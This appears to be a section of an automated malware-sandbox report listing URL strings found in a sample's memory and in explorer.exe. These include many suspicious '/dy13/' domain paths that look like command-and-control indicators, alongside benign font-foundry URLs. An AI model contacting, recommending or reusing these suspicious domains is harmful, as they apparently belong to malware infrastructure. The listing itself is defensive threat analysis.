Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carefulapp.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carefulapp.com/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carefulapp.com/dy13/www.freedompopo.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carefulapp.comReferer:
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cpuk-finance.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cpuk-finance.com/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cpuk-finance.com/dy13/www.acc-pay.top
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cpuk-finance.comReferer:
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freedompopo.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freedompopo.com/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freedompopo.com/dy13/www.bdsmnutzbar.info
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freedompopo.comReferer:
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.imuschestvostorgov.online
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.imuschestvostorgov.online/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.imuschestvostorgov.online/dy13/www.cpuk-finance.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.imuschestvostorgov.onlineReferer:
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.manga-house.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.manga-house.com/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.manga-house.com/dy13/www.carefulapp.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.manga-house.comReferer:
Source: mQY9ka5sW6hv2Ri.exe	String found in binary or memory: http://www.opcom.ro/rapoarte/export_csv_raportPIPsiVolumTranzactionat_PI.php?zi=
Source: mQY9ka5sW6hv2Ri.exe	String found in binary or memory: http://www.opcom.ro/rapoarte/export_xml_PIPsiVolTranPI.php?zi=
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.real-estate-96841.bond
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.real-estate-96841.bond/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.real-estate-96841.bond/dy13/www.taini00.net
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.real-estate-96841.bondReferer:
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662514857.00000000053A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sdplat.media
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sdplat.media/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sdplat.media/dy13/www.soloparentconnect.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sdplat.mediaReferer:
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.soloparentconnect.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.soloparentconnect.com/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.soloparentconnect.com/dy13/www.b0ba138.xyz
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.soloparentconnect.comReferer:
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taini00.net
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taini00.net/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taini00.net/dy13/www.sdplat.media
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.taini00.netReferer:
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyupok.xyz
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyupok.xyz/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyupok.xyz/dy13/www.484844.vip
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyupok.xyzReferer:
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.umeshraja.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.umeshraja.com/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.umeshraja.com/dy13/www.883106.photos
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.umeshraja.comReferer:
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000005.00000000.1672208552.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
